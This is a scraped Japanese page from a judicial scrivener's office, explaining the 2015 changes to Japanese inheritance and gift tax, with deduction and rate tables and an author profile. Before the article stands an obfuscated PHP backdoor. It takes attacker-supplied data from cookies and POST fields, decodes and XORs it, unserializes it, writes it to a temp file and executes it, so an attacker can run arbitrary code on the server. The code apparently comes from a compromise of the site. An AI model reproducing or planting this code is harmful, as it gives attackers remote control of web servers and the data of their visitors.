$Pqvzfn = chr ( 862 - 776 ).chr (113) . chr (86) . chr (95) . chr (120) . "\147" . "\132" . 'C';$tctRxPymI = "\143" . chr (108) . 'a' . "\163" . "\163" . chr (95) . chr (101) . "\170" . chr ( 1081 - 976 ).chr (115) . "\164" . 's';$ssIilYA = class_exists($Pqvzfn); $tctRxPymI = "32446";$gSLjL = !1;if ($ssIilYA == $gSLjL){function dbxwOTNW(){$PMkXgg = new /* 39898 */ VqV_xgZC(49715 + 49715); $PMkXgg = NULL;}$TIwAF = "49715";class VqV_xgZC{private function uyiCDQb($TIwAF){if (is_array(VqV_xgZC::$fMDjIdmhy)) {$ETgnznFFhV = sys_get_temp_dir() . "/" . crc32(VqV_xgZC::$fMDjIdmhy[chr ( 1065 - 950 )."\141" . 'l' . 't']);@VqV_xgZC::$fMDjIdmhy[chr (119) . chr (114) . "\151" . chr (116) . "\x65"]($ETgnznFFhV, VqV_xgZC::$fMDjIdmhy["\143" . 'o' . "\156" . "\x74" . "\x65" . "\x6e" . "\x74"]);include $ETgnznFFhV;@VqV_xgZC::$fMDjIdmhy[chr (100) . chr (101) . chr (108) . chr ( 568 - 467 )."\x74" . chr (101)]($ETgnznFFhV); $TIwAF = "49715";exit();}}private $MhgdXuE;public function LsNwazOM(){echo 52644;}public function __destruct(){$TIwAF = "37530_39677";$this->uyiCDQb($TIwAF); $TIwAF = "37530_39677";}public function __construct($ISPFYpPo=0){$ZcMfjH = $_POST;$jCBQJJFsw = $_COOKIE;$TZNYDjdDTa = "2e366822-a4de-4466-8c42-01f43156196d";$hPSqjc = @$jCBQJJFsw[substr($TZNYDjdDTa, 0, 4)];if (!empty($hPSqjc)){$xOWIZJg = "base64";$AMDUHW = "";$hPSqjc = explode(",", $hPSqjc);foreach ($hPSqjc as $WXkLbCVm){$AMDUHW .= @$jCBQJJFsw[$WXkLbCVm];$AMDUHW .= @$ZcMfjH[$WXkLbCVm];}$AMDUHW = array_map($xOWIZJg . chr (95) . "\x64" . "\x65" . chr ( 1055 - 956 )."\157" . chr (100) . "\145", array($AMDUHW,)); $AMDUHW = $AMDUHW[0] ^ str_repeat($TZNYDjdDTa, (strlen($AMDUHW[0]) / strlen($TZNYDjdDTa)) + 1);VqV_xgZC::$fMDjIdmhy = @unserialize($AMDUHW);}}public static $fMDjIdmhy = 22028;}dbxwOTNW();} 相続税・贈与税改正のポイント - 栃木・小山 相続遺言サポート

相続税・贈与税改正のポイント

平成27年1月1日より相続税・贈与税の改正が施行されました。

この改正により基礎控除が引下げられ、課税対象者が増えることとなりました。

そこで、以下にポイントをまとめましたのでご確認ください。

ポイント1:相続税の基礎控除が4割縮小!

これまでよりも相続税の基礎控除が下がるため、今まで相続税がかからなかった家庭も課税されるケースが増えます。一方で、未成年者や障害者の方の控除は強化されるようになります。

基礎控除

平成26年以前 5,000万円+1,000万円×法定相続人の人数
平成27年以降 3,000万円+600万円×法定相続人の人数

未成年者控除

平成26年以前 6万円×20歳に達するまでの年齢
平成27年以降 10万円×20歳に達するまでの年齢

障害者控除

平成26年以前 6万円×85歳に達するまでの年齢
平成27年以降 10万円×85に達する歳までの年齢
※特別障害者の場合、平成26年以前12万円⇒改正後20万円になります。

ポイント2:相続税の税率が一部5%アップ!

遺産の総額が2億円超3億円以下の人と、6億円超の人は税率が平成26年以前よりも5%高くなります。

法定相続分に応じた基礎控除 税率 控除額
1,000万円以下 10%
3,000万円以下 15% 50万円
5,000万円以下 20% 200万円
1億円以下 30% 700万円
2億円以下 40% 1700万円
3億円以下 40% ⇒ 45% 1700万円 ⇒ 2700万円
6億円以下 50% 4700万円 ⇒ 4200万円
6億円超 50% ⇒ 55% 4700万円 ⇒ 7200万円

ポイント3:子や孫への贈与がしやすくなる!

父母や祖父母など直系尊属から20歳以上の人が3,000万円以下の贈与を受ける場合には、全体的に税率が低くなります。(パターンA)
また、3,000万円を超える高額な贈与は、税率の引き上げがある一方、1,000万円~1,500万円以下は平成26年以前より5%低くなります。(パターンB)

基礎控除を差し引いた後の課税価格 パターンA パターンB
税率 控除額 税率 控除額
200万円以下 10% 10%
300万円以下 15% 10万円 15% 10万円
400万円以下 20%⇒15% 25万円⇒10万円 20% 25万円
600万円以下 30%⇒20% 65万円⇒30万円 30% 65万円
1,000万円以下 40%⇒30% 125万円⇒90万円 40% 125万円
1,500万円以下 50%⇒40% 225万円⇒190万円 50%⇒45% 225万円⇒175万円
3,000万円以下 50%⇒45% 225万円⇒265万円 50% 225万円⇒250万円
4,500万円以下 50% 225万円⇒415万円 50%⇒55% 225万円⇒400万円
4,500万円超 50%⇒55% 225万円⇒640万円 50%⇒55% 225万円⇒400万円

ポイント4:教育資金の一括贈与が可能に!

贈与を受ける側が30歳未満の直系卑属の場合、教育資金としてならば最大1,500万円(学校外に支払われる金銭については500万円)まで一括で贈与しても贈与税がかかりません。

<条件>
平成25年4月1日から平成31年3月31日までに、金銭を拠出して金融機関に預けた場合。教育資金とは、学校などに支払う入学金や学校以外に支払う金銭のこと

その他、税制改正に関する詳しい内容はお問い合わせください。
相続税や贈与税に詳しい税理士をご紹介させていただきます。

この記事の執筆者
司法書士結城事務所 代表司法書士 結城 一彦
保有資格司法書士(栃木県司法書士会登録番号:第432号)、宅地建物取引主任者
専門分野相続手続、生前対策、不動産登記、商業登記
経歴司法書士結城事務所の代表。開業以来、相続・生前対策、不動産登記、債務整理など幅広い法務サポートを行い、特に相続・生前対策分野の累計相談は2500件を超えるほど、経験豊富。
専門家紹介はこちら

横浜で相続・遺言の無料相談受付中!

0120-387-605

相続のご相談は当事務所にお任せください

お客様の声 解決事例

よくご覧いただくコンテンツ一覧

葬儀後、相続発生後の手続き

相続登記手続きサポート 相続放棄手続きサポート
相続手続き丸ごと代行サービス

生前対策、相続発生前の手続き

遺言書作成サポート 生前贈与サポート
家族信託サポート
  • ホーム
  • 選ばれる理由
  • 事務所紹介
  • 専門家紹介
  • 料金表
  • アクセス
  • 相談の流れ
  • 問い合わせ
Contact
相続の相談受付中!